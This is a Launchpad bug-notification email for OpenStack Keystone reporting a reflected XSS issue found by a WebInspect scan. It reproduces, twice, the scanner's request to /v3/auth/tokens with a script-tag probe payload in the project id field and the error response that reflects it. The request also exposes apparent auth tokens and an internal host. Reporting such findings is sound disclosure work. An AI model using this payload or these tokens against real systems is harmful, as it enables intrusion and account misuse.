Public bug reported: Using webinspect tool to test, the test results show that there is XSS issues.
Critical Issues Cross-Site Scripting: Reflected ( 5649 ) View Description CWE: 79,80,82,83,87,116,692,811 Kingdom: Input Validation and Representation Page: Parameter: $.auth.scope.project.id Request: POST /v3/auth/tokens HTTP/1.1 Host: 10.62.48.69 Content-Length: 336 Cache-Control: no-cache User-Id: fcebae72c7b34e259be8f003499a4bd1 Pragma: no-cache Origin: https://10.62.48.69 Project-Id: 14f32da561324e2c8790c60558844a0a Access-Token: gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJn ByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ Content-Type: application/json Accept: application/json, text/plain, */* X-Auth-Token: gAAAAABcwW_XT5iUG2uH0kSm_594hJb-k1_utLvDp1DTPB-ZNByJ0CZLYwCwH8V7vufMASXtt6L0KlXLL_rQdFYjleCF7rai5WxpAsY1SwjejsIvKBU05m1jmi_AVJKzI CXnZC7vcM0AwHQ1v_ZEasXDeKFkwz7W2Dp8QymzUBoQMlwRX6Ta9yWAWk-M9LxWD3GtzLIOoOzR IsScopeDomain: false siderbarBoolMsg: cloudManagementViewBool If-Modified-Since: Mon, 26 Jul 1997 05:00:00 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 operateuser: admin Referer: https://10.62.48.69/ngportal/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: Keep-Alive X-WIPP: AscVersion=18.20.178.0 X-Scan-Memo: Category="Audit.Attack"; SID="C13A9BA9ACA4260D094783D9B4A13852"; PSID="2BA1D619C8CFF66416259BDDB34002B6"; SessionType="AuditAttack"; CrawlType="None"; AttackType="PostSubParamInjection"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="13"; AttackParamDesc="%24.auth.scope.project.id"; AttackParamIndex="0"; AttackParamSubIndex="2"; CheckId="5105"; Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="14f32da561324e2c8790c60558844a0a%253c% 2573%2543%2572%2549%2570%2554%2520%2574%2559%2570%2545%253d%2574%2545% 2578%2554%252f%2576%2542%2573%2543%2572%2549%2570%2554%253e%254d%2573% 2567%2542%256f%2578%2528%2537%2532%2532%2534%2533%2529%253c%252f%2573% 2543%2572%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="493"; ThreadType="AuditorStateRequestor"; X-RequestManager-Memo: RequestorThreadIndex="6"; sid="825"; smi="0"; sc="1"; ID="dc87d526-e838-4f7c-9b79-94723727e38a"; X-Request-Memo: ID="520187c2-3597-4998-a2eb-68db0ae93a5b"; sc="1"; ThreadId="493"; Cookie: CustomCookie=WebInspect0 {"auth":{"identity":{"methods":["token"],"token":{"id":"gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJn ByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ"}},"scope":{"project": {"id":"14f32da561324e2c8790c60558844a0a<sCrIpT tYpE=tExT\/vBsCrIpT>MsgBox(72243) <\/sCrIpT>"}}}} Response: HTTP/1.1 401 Unauthorized Server: IAGV3.06.01 Date: Thu, 25 Apr 2019 09:13:44 GMT Content-Type: application/json Content-Length: 226 Connection: keep-alive Vary: X-Auth-Token x-openstack-request-id: req-1b47ef10-ece1-41b1-8b56-88a4aba415b0 WWW-Authenticate: Keystone uri="https://10.62.48.69" ...TRUNCATED...not find project: 14f32da561324e2c8790c60558844a0a <sCrIpT tYpE=tExT/vBsCrIpT>MsgBox(72243)</sCrIpT> (Disable insecure_debug mode to suppress these de...TRUNCATED... ** Affects: keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1829594 Title: Find XSS issue in test Status in OpenStack Identity (keystone): New Bug description: Using webinspect tool to test, the test results show that there is XSS issues. Critical Issues Cross-Site Scripting: Reflected ( 5649 ) View Description CWE: 79,80,82,83,87,116,692,811 Kingdom: Input Validation and Representation Page: Parameter: $.auth.scope.project.id Request: POST /v3/auth/tokens HTTP/1.1 Host: 10.62.48.69 Content-Length: 336 Cache-Control: no-cache User-Id: fcebae72c7b34e259be8f003499a4bd1 Pragma: no-cache Origin: https://10.62.48.69 Project-Id: 14f32da561324e2c8790c60558844a0a Access-Token: gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJn ByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ Content-Type: application/json Accept: application/json, text/plain, */* X-Auth-Token: gAAAAABcwW_XT5iUG2uH0kSm_594hJb-k1_utLvDp1DTPB-ZNByJ0CZLYwCwH8V7vufMASXtt6L0KlXLL_rQdFYjleCF7rai5WxpAsY1SwjejsIvKBU05m1jmi_AVJKzI CXnZC7vcM0AwHQ1v_ZEasXDeKFkwz7W2Dp8QymzUBoQMlwRX6Ta9yWAWk-M9LxWD3GtzLIOoOzR IsScopeDomain: false siderbarBoolMsg: cloudManagementViewBool If-Modified-Since: Mon, 26 Jul 1997 05:00:00 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 operateuser: admin Referer: https://10.62.48.69/ngportal/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: Keep-Alive X-WIPP: AscVersion=18.20.178.0 X-Scan-Memo: Category="Audit.Attack"; SID="C13A9BA9ACA4260D094783D9B4A13852"; PSID="2BA1D619C8CFF66416259BDDB34002B6"; SessionType="AuditAttack"; CrawlType="None"; AttackType="PostSubParamInjection"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="13"; AttackParamDesc="%24.auth.scope.project.id"; AttackParamIndex="0"; AttackParamSubIndex="2"; CheckId="5105"; Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="14f32da561324e2c8790c60558844a0a%253c% 2573%2543%2572%2549%2570%2554%2520%2574%2559%2570%2545%253d%2574%2545% 2578%2554%252f%2576%2542%2573%2543%2572%2549%2570%2554%253e%254d%2573% 2567%2542%256f%2578%2528%2537%2532%2532%2534%2533%2529%253c%252f%2573% 2543%2572%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="493"; ThreadType="AuditorStateRequestor"; X-RequestManager-Memo: RequestorThreadIndex="6"; sid="825"; smi="0"; sc="1"; ID="dc87d526-e838-4f7c-9b79-94723727e38a"; X-Request-Memo: ID="520187c2-3597-4998-a2eb-68db0ae93a5b"; sc="1"; ThreadId="493"; Cookie: CustomCookie=WebInspect0 {"auth":{"identity":{"methods":["token"],"token":{"id":"gAAAAABcwW-3ahN06YGt69MyU4GULjxlkWAzC0w5eYf88JqK07CKjdmNWZo42VLhMLS308BEH98vIcD3aCXJ9XlJn ByuVvkqJYRjqSS2DLJBr0s6UHMBPsQlotM0_2w_fmn9Xhx0-lftDvdn9xO9Kn_zwuY2Odb7GQ"}},"scope":{"project": {"id":"14f32da561324e2c8790c60558844a0a<sCrIpT tYpE=tExT\/vBsCrIpT>MsgBox(72243) <\/sCrIpT>"}}}} Response: HTTP/1.1 401 Unauthorized Server: IAGV3.06.01 Date: Thu, 25 Apr 2019 09:13:44 GMT Content-Type: application/json Content-Length: 226 Connection: keep-alive Vary: X-Auth-Token x-openstack-request-id: req-1b47ef10-ece1-41b1-8b56-88a4aba415b0 WWW-Authenticate: Keystone uri="https://10.62.48.69" ...TRUNCATED...not find project: 14f32da561324e2c8790c60558844a0a <sCrIpT tYpE=tExT/vBsCrIpT>MsgBox(72243)</sCrIpT> (Disable insecure_debug mode to suppress these de...TRUNCATED... To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1829594/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp